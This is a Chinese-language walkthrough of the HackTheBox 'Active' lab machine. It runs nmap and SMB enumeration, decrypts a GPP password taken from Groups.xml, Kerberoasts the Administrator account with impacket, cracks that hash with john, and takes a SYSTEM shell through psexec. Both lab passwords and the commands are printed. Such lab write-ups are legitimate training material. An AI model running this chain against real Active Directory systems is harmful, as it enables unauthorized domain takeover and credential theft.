环境介绍：

名称：Active

系统：Windows

信息搜集

获取目标

1

$ nmap -A 10.10.10.100

• 系统为Windows Server,端口53、88、135、139、445开放，smb匿名`可访问。

shell获取

smb分析

1

$ enum4linux -S 10.10.10.100

• 有Replication目录。

smb 登录

1
2
3
4
5
6
7
8

$ smbclient //10.10.10.100/Replication
Enter WORKGROUP\root's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  active.htb     

• 匿名访问smb，发现一个Groups.xml，下载下来。

解码

• 将下载的Groups.xml打开，发现一个用户svc_tgs，和一段加密的密码。选择使用gpp-decrypt解码。解码后得到密码：GPPstillStandingStrong2k18。

flag1

1

$ smbclient -U svc_tgs //10.10.10.100/Users

• 使用svc_tgs用户通过smb登录后获取到flag1。

提权

用户hash枚举

• 使用impacket-GetUserSPNs枚举到用户Administrator及hash。

密码枚举

• 新建一个ad.txt，将上面的hash保存后运行john解密。解密后密码为：Ticketmaster1968。

获得flag

$ psexec.py administrator:[email protected]
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file rlXCVuTq.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service eqLR on 10.10.10.100.....
[*] Starting service eqLR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

• 通过psexec.py登录系统获取flag。

心得

很不错的windows渗透思路，从单纯的漏洞利用，到更加一点儿的windows渗透。